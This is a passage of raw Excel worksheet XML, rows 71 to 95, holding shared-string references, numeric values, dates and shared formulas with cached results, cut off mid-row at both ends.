      <c r="O71" s="1" t="s">
        <v>392</v>
      </c>
      <c r="P71" s="1" t="s">
        <v>393</v>
      </c>
      <c r="Q71" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R71" s="2">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="S71" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="72">
      <c r="A72" s="1">
        <v>461.0</v>
      </c>
      <c r="B72" s="2" t="s">
        <v>394</v>
      </c>
      <c r="C72" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D72" s="2" t="s">
        <v>395</v>
      </c>
      <c r="E72" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F72" s="1" t="s">
        <v>396</v>
      </c>
      <c r="G72" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H72" s="1" t="s">
        <v>397</v>
      </c>
      <c r="I72" s="1" t="s">
        <v>34</v>
      </c>
      <c r="J72" s="1" t="s">
        <v>390</v>
      </c>
      <c r="K72" s="2" t="s">
        <v>391</v>
      </c>
      <c r="L72" s="1">
        <v>2.0</v>
      </c>
      <c r="M72" s="1">
        <v>4.0</v>
      </c>
      <c r="N72" s="1" t="s">
        <v>398</v>
      </c>
      <c r="O72" s="1" t="s">
        <v>392</v>
      </c>
      <c r="P72" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q72" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R72" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S72" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="73">
      <c r="A73" s="1">
        <v>462.0</v>
      </c>
      <c r="B73" s="2" t="s">
        <v>399</v>
      </c>
      <c r="C73" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D73" s="2" t="s">
        <v>400</v>
      </c>
      <c r="E73" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F73" s="1" t="s">
        <v>388</v>
      </c>
      <c r="G73" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H73" s="1" t="s">
        <v>401</v>
      </c>
      <c r="I73" s="1" t="s">
        <v>34</v>
      </c>
      <c r="J73" s="1" t="s">
        <v>390</v>
      </c>
      <c r="K73" s="2" t="s">
        <v>391</v>
      </c>
      <c r="L73" s="1">
        <v>2.0</v>
      </c>
      <c r="M73" s="1">
        <v>4.0</v>
      </c>
      <c r="N73" s="1" t="s">
        <v>402</v>
      </c>
      <c r="O73" s="1" t="s">
        <v>392</v>
      </c>
      <c r="P73" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q73" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R73" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S73" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="74">
      <c r="A74" s="1">
        <v>464.0</v>
      </c>
      <c r="B74" s="2" t="s">
        <v>403</v>
      </c>
      <c r="C74" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D74" s="2" t="s">
        <v>404</v>
      </c>
      <c r="E74" s="2" t="s">
        <v>405</v>
      </c>
      <c r="F74" s="1" t="s">
        <v>406</v>
      </c>
      <c r="G74" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H74" s="1" t="s">
        <v>407</v>
      </c>
      <c r="I74" s="1" t="s">
        <v>408</v>
      </c>
      <c r="J74" s="1" t="s">
        <v>409</v>
      </c>
      <c r="K74" s="2" t="s">
        <v>410</v>
      </c>
      <c r="L74" s="1">
        <v>3.0</v>
      </c>
      <c r="M74" s="1">
        <v>3.0</v>
      </c>
      <c r="N74" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O74" s="1" t="s">
        <v>411</v>
      </c>
      <c r="P74" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q74" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R74" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S74" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="75">
      <c r="A75" s="1">
        <v>467.0</v>
      </c>
      <c r="B75" s="2" t="s">
        <v>412</v>
      </c>
      <c r="C75" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D75" s="2" t="s">
        <v>413</v>
      </c>
      <c r="E75" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F75" s="1" t="s">
        <v>159</v>
      </c>
      <c r="G75" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H75" s="1" t="s">
        <v>414</v>
      </c>
      <c r="I75" s="1" t="s">
        <v>161</v>
      </c>
      <c r="J75" s="1" t="s">
        <v>415</v>
      </c>
      <c r="K75" s="2" t="s">
        <v>416</v>
      </c>
      <c r="L75" s="1">
        <v>1.0</v>
      </c>
      <c r="M75" s="1">
        <v>1.0</v>
      </c>
      <c r="N75" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O75" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P75" s="1" t="s">
        <v>417</v>
      </c>
      <c r="Q75" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R75" s="2">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="S75" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="76">
      <c r="A76" s="1">
        <v>468.0</v>
      </c>
      <c r="B76" s="2" t="s">
        <v>418</v>
      </c>
      <c r="C76" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D76" s="2" t="s">
        <v>419</v>
      </c>
      <c r="E76" s="2" t="s">
        <v>42</v>
      </c>
      <c r="F76" s="1" t="s">
        <v>420</v>
      </c>
      <c r="G76" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H76" s="1" t="s">
        <v>421</v>
      </c>
      <c r="I76" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J76" s="1" t="s">
        <v>422</v>
      </c>
      <c r="K76" s="2" t="s">
        <v>423</v>
      </c>
      <c r="L76" s="1">
        <v>8.0</v>
      </c>
      <c r="M76" s="1">
        <v>24.0</v>
      </c>
      <c r="N76" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O76" s="1" t="s">
        <v>424</v>
      </c>
      <c r="P76" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q76" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R76" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S76" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="77">
      <c r="A77" s="1">
        <v>469.0</v>
      </c>
      <c r="B77" s="2" t="s">
        <v>425</v>
      </c>
      <c r="C77" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D77" s="2" t="s">
        <v>426</v>
      </c>
      <c r="E77" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F77" s="1" t="s">
        <v>427</v>
      </c>
      <c r="G77" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H77" s="1" t="s">
        <v>428</v>
      </c>
      <c r="I77" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J77" s="1" t="s">
        <v>422</v>
      </c>
      <c r="K77" s="2" t="s">
        <v>423</v>
      </c>
      <c r="L77" s="1">
        <v>8.0</v>
      </c>
      <c r="M77" s="1">
        <v>24.0</v>
      </c>
      <c r="N77" s="1" t="s">
        <v>429</v>
      </c>
      <c r="O77" s="1" t="s">
        <v>424</v>
      </c>
      <c r="P77" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q77" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R77" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S77" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="78">
      <c r="A78" s="1">
        <v>470.0</v>
      </c>
      <c r="B78" s="2" t="s">
        <v>430</v>
      </c>
      <c r="C78" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D78" s="2" t="s">
        <v>426</v>
      </c>
      <c r="E78" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F78" s="1" t="s">
        <v>431</v>
      </c>
      <c r="G78" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H78" s="1" t="s">
        <v>432</v>
      </c>
      <c r="I78" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J78" s="1" t="s">
        <v>422</v>
      </c>
      <c r="K78" s="2" t="s">
        <v>423</v>
      </c>
      <c r="L78" s="1">
        <v>8.0</v>
      </c>
      <c r="M78" s="1">
        <v>24.0</v>
      </c>
      <c r="N78" s="1" t="s">
        <v>433</v>
      </c>
      <c r="O78" s="1" t="s">
        <v>424</v>
      </c>
      <c r="P78" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q78" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R78" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S78" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="79">
      <c r="A79" s="1">
        <v>472.0</v>
      </c>
      <c r="B79" s="2" t="s">
        <v>434</v>
      </c>
      <c r="C79" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D79" s="2" t="s">
        <v>435</v>
      </c>
      <c r="E79" s="2" t="s">
        <v>42</v>
      </c>
      <c r="F79" s="1" t="s">
        <v>420</v>
      </c>
      <c r="G79" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H79" s="1" t="s">
        <v>436</v>
      </c>
      <c r="I79" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J79" s="1" t="s">
        <v>422</v>
      </c>
      <c r="K79" s="2" t="s">
        <v>423</v>
      </c>
      <c r="L79" s="1">
        <v>8.0</v>
      </c>
      <c r="M79" s="1">
        <v>24.0</v>
      </c>
      <c r="N79" s="1" t="s">
        <v>205</v>
      </c>
      <c r="O79" s="1" t="s">
        <v>424</v>
      </c>
      <c r="P79" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q79" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R79" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S79" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="80">
      <c r="A80" s="1">
        <v>473.0</v>
      </c>
      <c r="B80" s="2" t="s">
        <v>437</v>
      </c>
      <c r="C80" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D80" s="2" t="s">
        <v>426</v>
      </c>
      <c r="E80" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F80" s="1" t="s">
        <v>438</v>
      </c>
      <c r="G80" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H80" s="1" t="s">
        <v>439</v>
      </c>
      <c r="I80" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J80" s="1" t="s">
        <v>422</v>
      </c>
      <c r="K80" s="2" t="s">
        <v>423</v>
      </c>
      <c r="L80" s="1">
        <v>8.0</v>
      </c>
      <c r="M80" s="1">
        <v>24.0</v>
      </c>
      <c r="N80" s="1" t="s">
        <v>440</v>
      </c>
      <c r="O80" s="1" t="s">
        <v>424</v>
      </c>
      <c r="P80" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q80" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R80" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S80" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="81">
      <c r="A81" s="1">
        <v>558.0</v>
      </c>
      <c r="B81" s="2" t="s">
        <v>441</v>
      </c>
      <c r="C81" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D81" s="2" t="s">
        <v>442</v>
      </c>
      <c r="E81" s="2" t="s">
        <v>443</v>
      </c>
      <c r="F81" s="1" t="s">
        <v>444</v>
      </c>
      <c r="G81" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H81" s="4">
        <v>44776.19513888889</v>
      </c>
      <c r="I81" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J81" s="1" t="s">
        <v>445</v>
      </c>
      <c r="K81" s="2" t="s">
        <v>446</v>
      </c>
      <c r="L81" s="1">
        <v>33.0</v>
      </c>
      <c r="M81" s="1">
        <v>47.0</v>
      </c>
      <c r="N81" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O81" s="1" t="s">
        <v>447</v>
      </c>
      <c r="P81" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q81" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R81" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S81" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="82">
      <c r="A82" s="1">
        <v>566.0</v>
      </c>
      <c r="B82" s="2" t="s">
        <v>448</v>
      </c>
      <c r="C82" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D82" s="2" t="s">
        <v>449</v>
      </c>
      <c r="E82" s="2" t="s">
        <v>89</v>
      </c>
      <c r="F82" s="1" t="s">
        <v>450</v>
      </c>
      <c r="G82" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H82" s="4">
        <v>44776.25833333333</v>
      </c>
      <c r="I82" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J82" s="1" t="s">
        <v>445</v>
      </c>
      <c r="K82" s="2" t="s">
        <v>446</v>
      </c>
      <c r="L82" s="1">
        <v>33.0</v>
      </c>
      <c r="M82" s="1">
        <v>47.0</v>
      </c>
      <c r="N82" s="1" t="s">
        <v>205</v>
      </c>
      <c r="O82" s="1" t="s">
        <v>447</v>
      </c>
      <c r="P82" s="1" t="s">
        <v>39</v>
      </c>
      <c r="Q82" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R82" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S82" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="83">
      <c r="A83" s="1">
        <v>568.0</v>
      </c>
      <c r="B83" s="2" t="s">
        <v>451</v>
      </c>
      <c r="C83" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D83" s="2" t="s">
        <v>449</v>
      </c>
      <c r="E83" s="2" t="s">
        <v>89</v>
      </c>
      <c r="F83" s="1" t="s">
        <v>450</v>
      </c>
      <c r="G83" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H83" s="4">
        <v>44776.26666666667</v>
      </c>
      <c r="I83" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J83" s="1" t="s">
        <v>445</v>
      </c>
      <c r="K83" s="2" t="s">
        <v>446</v>
      </c>
      <c r="L83" s="1">
        <v>33.0</v>
      </c>
      <c r="M83" s="1">
        <v>47.0</v>
      </c>
      <c r="N83" s="1" t="s">
        <v>28</v>
      </c>
      <c r="O83" s="1" t="s">
        <v>447</v>
      </c>
      <c r="P83" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q83" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R83" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S83" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="84">
      <c r="A84" s="1">
        <v>603.0</v>
      </c>
      <c r="B84" s="2" t="s">
        <v>452</v>
      </c>
      <c r="C84" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D84" s="2" t="s">
        <v>453</v>
      </c>
      <c r="E84" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F84" s="1" t="s">
        <v>454</v>
      </c>
      <c r="G84" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H84" s="4">
        <v>44807.595138888886</v>
      </c>
      <c r="I84" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J84" s="1" t="s">
        <v>445</v>
      </c>
      <c r="K84" s="2" t="s">
        <v>446</v>
      </c>
      <c r="L84" s="1">
        <v>33.0</v>
      </c>
      <c r="M84" s="1">
        <v>47.0</v>
      </c>
      <c r="N84" s="1" t="s">
        <v>455</v>
      </c>
      <c r="O84" s="1" t="s">
        <v>447</v>
      </c>
      <c r="P84" s="1" t="s">
        <v>456</v>
      </c>
      <c r="Q84" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R84" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S84" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="85">
      <c r="A85" s="1">
        <v>623.0</v>
      </c>
      <c r="B85" s="2" t="s">
        <v>457</v>
      </c>
      <c r="C85" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D85" s="2" t="s">
        <v>458</v>
      </c>
      <c r="E85" s="2" t="s">
        <v>111</v>
      </c>
      <c r="F85" s="1" t="s">
        <v>459</v>
      </c>
      <c r="G85" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H85" s="1" t="s">
        <v>460</v>
      </c>
      <c r="I85" s="1" t="s">
        <v>461</v>
      </c>
      <c r="J85" s="1" t="s">
        <v>462</v>
      </c>
      <c r="K85" s="2" t="s">
        <v>463</v>
      </c>
      <c r="L85" s="1">
        <v>7.0</v>
      </c>
      <c r="M85" s="1">
        <v>21.0</v>
      </c>
      <c r="N85" s="1" t="s">
        <v>464</v>
      </c>
      <c r="O85" s="1" t="s">
        <v>465</v>
      </c>
      <c r="P85" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q85" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R85" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S85" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="86">
      <c r="A86" s="1">
        <v>624.0</v>
      </c>
      <c r="B86" s="2" t="s">
        <v>466</v>
      </c>
      <c r="C86" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D86" s="2" t="s">
        <v>467</v>
      </c>
      <c r="E86" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F86" s="1" t="s">
        <v>468</v>
      </c>
      <c r="G86" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H86" s="1" t="s">
        <v>469</v>
      </c>
      <c r="I86" s="1" t="s">
        <v>461</v>
      </c>
      <c r="J86" s="1" t="s">
        <v>462</v>
      </c>
      <c r="K86" s="2" t="s">
        <v>463</v>
      </c>
      <c r="L86" s="1">
        <v>7.0</v>
      </c>
      <c r="M86" s="1">
        <v>21.0</v>
      </c>
      <c r="N86" s="1" t="s">
        <v>470</v>
      </c>
      <c r="O86" s="1" t="s">
        <v>465</v>
      </c>
      <c r="P86" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q86" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R86" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S86" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="87">
      <c r="A87" s="1">
        <v>626.0</v>
      </c>
      <c r="B87" s="2" t="s">
        <v>471</v>
      </c>
      <c r="C87" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D87" s="2" t="s">
        <v>472</v>
      </c>
      <c r="E87" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F87" s="1" t="s">
        <v>159</v>
      </c>
      <c r="G87" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H87" s="1" t="s">
        <v>473</v>
      </c>
      <c r="I87" s="1" t="s">
        <v>161</v>
      </c>
      <c r="J87" s="1" t="s">
        <v>474</v>
      </c>
      <c r="K87" s="2" t="s">
        <v>475</v>
      </c>
      <c r="L87" s="1">
        <v>1.0</v>
      </c>
      <c r="M87" s="1">
        <v>1.0</v>
      </c>
      <c r="N87" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O87" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P87" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q87" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R87" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S87" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="88">
      <c r="A88" s="1">
        <v>722.0</v>
      </c>
      <c r="B88" s="2" t="s">
        <v>476</v>
      </c>
      <c r="C88" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D88" s="2" t="s">
        <v>477</v>
      </c>
      <c r="E88" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F88" s="1" t="s">
        <v>232</v>
      </c>
      <c r="G88" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H88" s="1" t="s">
        <v>478</v>
      </c>
      <c r="I88" s="1" t="s">
        <v>220</v>
      </c>
      <c r="J88" s="1" t="s">
        <v>479</v>
      </c>
      <c r="K88" s="2" t="s">
        <v>480</v>
      </c>
      <c r="L88" s="1">
        <v>16.0</v>
      </c>
      <c r="M88" s="1">
        <v>57.0</v>
      </c>
      <c r="N88" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O88" s="1" t="s">
        <v>481</v>
      </c>
      <c r="P88" s="1" t="s">
        <v>482</v>
      </c>
      <c r="Q88" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R88" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S88" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="89">
      <c r="A89" s="1">
        <v>723.0</v>
      </c>
      <c r="B89" s="2" t="s">
        <v>483</v>
      </c>
      <c r="C89" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D89" s="2" t="s">
        <v>484</v>
      </c>
      <c r="E89" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F89" s="1" t="s">
        <v>485</v>
      </c>
      <c r="G89" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H89" s="1" t="s">
        <v>486</v>
      </c>
      <c r="I89" s="1" t="s">
        <v>220</v>
      </c>
      <c r="J89" s="1" t="s">
        <v>479</v>
      </c>
      <c r="K89" s="2" t="s">
        <v>480</v>
      </c>
      <c r="L89" s="1">
        <v>16.0</v>
      </c>
      <c r="M89" s="1">
        <v>57.0</v>
      </c>
      <c r="N89" s="1" t="s">
        <v>487</v>
      </c>
      <c r="O89" s="1" t="s">
        <v>481</v>
      </c>
      <c r="P89" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q89" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R89" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S89" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="90">
      <c r="A90" s="1">
        <v>779.0</v>
      </c>
      <c r="B90" s="2" t="s">
        <v>488</v>
      </c>
      <c r="C90" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D90" s="2" t="s">
        <v>489</v>
      </c>
      <c r="E90" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F90" s="1" t="s">
        <v>159</v>
      </c>
      <c r="G90" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H90" s="1" t="s">
        <v>490</v>
      </c>
      <c r="I90" s="1" t="s">
        <v>161</v>
      </c>
      <c r="J90" s="1" t="s">
        <v>491</v>
      </c>
      <c r="K90" s="2" t="s">
        <v>492</v>
      </c>
      <c r="L90" s="1">
        <v>1.0</v>
      </c>
      <c r="M90" s="1">
        <v>1.0</v>
      </c>
      <c r="N90" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O90" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P90" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q90" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R90" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S90" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="91">
      <c r="A91" s="1">
        <v>832.0</v>
      </c>
      <c r="B91" s="2" t="s">
        <v>493</v>
      </c>
      <c r="C91" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D91" s="2" t="s">
        <v>494</v>
      </c>
      <c r="E91" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F91" s="1" t="s">
        <v>159</v>
      </c>
      <c r="G91" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H91" s="4">
        <v>44531.98819444444</v>
      </c>
      <c r="I91" s="1" t="s">
        <v>161</v>
      </c>
      <c r="J91" s="1" t="s">
        <v>495</v>
      </c>
      <c r="K91" s="2" t="s">
        <v>496</v>
      </c>
      <c r="L91" s="1">
        <v>1.0</v>
      </c>
      <c r="M91" s="1">
        <v>1.0</v>
      </c>
      <c r="N91" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O91" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P91" s="1" t="s">
        <v>497</v>
      </c>
      <c r="Q91" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R91" s="2">
        <f t="shared" si="2"/>
        <v>15</v>
      </c>
      <c r="S91" s="1">
        <f t="shared" si="3"/>
        <v>15</v>
      </c>
    </row>
    <row r="92">
      <c r="A92" s="1">
        <v>839.0</v>
      </c>
      <c r="B92" s="2" t="s">
        <v>498</v>
      </c>
      <c r="C92" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D92" s="2" t="s">
        <v>499</v>
      </c>
      <c r="E92" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F92" s="1" t="s">
        <v>500</v>
      </c>
      <c r="G92" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H92" s="4">
        <v>44536.93958333333</v>
      </c>
      <c r="I92" s="1" t="s">
        <v>54</v>
      </c>
      <c r="J92" s="1" t="s">
        <v>501</v>
      </c>
      <c r="K92" s="2" t="s">
        <v>502</v>
      </c>
      <c r="L92" s="1">
        <v>6.0</v>
      </c>
      <c r="M92" s="1">
        <v>10.0</v>
      </c>
      <c r="N92" s="1" t="s">
        <v>28</v>
      </c>
      <c r="O92" s="1" t="s">
        <v>503</v>
      </c>
      <c r="P92" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q92" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R92" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S92" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="93">
      <c r="A93" s="1">
        <v>844.0</v>
      </c>
      <c r="B93" s="2" t="s">
        <v>504</v>
      </c>
      <c r="C93" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D93" s="2" t="s">
        <v>505</v>
      </c>
      <c r="E93" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F93" s="1" t="s">
        <v>271</v>
      </c>
      <c r="G93" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H93" s="1" t="s">
        <v>506</v>
      </c>
      <c r="I93" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J93" s="1" t="s">
        <v>507</v>
      </c>
      <c r="K93" s="2" t="s">
        <v>508</v>
      </c>
      <c r="L93" s="1">
        <v>3.0</v>
      </c>
      <c r="M93" s="1">
        <v>8.0</v>
      </c>
      <c r="N93" s="1" t="s">
        <v>202</v>
      </c>
      <c r="O93" s="1" t="s">
        <v>509</v>
      </c>
      <c r="P93" s="1" t="s">
        <v>510</v>
      </c>
      <c r="Q93" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R93" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S93" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="94">
      <c r="A94" s="1">
        <v>846.0</v>
      </c>
      <c r="B94" s="7" t="s">
        <v>511</v>
      </c>
      <c r="C94" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D94" s="2" t="s">
        <v>512</v>
      </c>
      <c r="E94" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F94" s="1" t="s">
        <v>271</v>
      </c>
      <c r="G94" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H94" s="1" t="s">
        <v>513</v>
      </c>
      <c r="I94" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J94" s="1" t="s">
        <v>507</v>
      </c>
      <c r="K94" s="2" t="s">
        <v>508</v>
      </c>
      <c r="L94" s="1">
        <v>3.0</v>
      </c>
      <c r="M94" s="1">
        <v>8.0</v>
      </c>
      <c r="N94" s="1" t="s">
        <v>514</v>
      </c>
      <c r="O94" s="1" t="s">
        <v>509</v>
      </c>
      <c r="P94" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q94" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R94" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S94" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="95">
      <c r="A95" s="1">
        <v>849.0</v>
      </c>
      <c r="B95" s="2" t="s">
        <v>515</v>
      </c>
      <c r="C95" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D95" s="2" t="s">
        <v>516</v>
      </c>
      <c r="E95" s="2" t="s">
        <v>517</v>
      </c>
      <c r="F95" s="1" t="s">
        <v>112</v>
      </c>
      <c r="G95" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H95" s="1" t="s">
        <v>518</v>
      </c>
      <c r="I95" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J95" s="1" t="s">
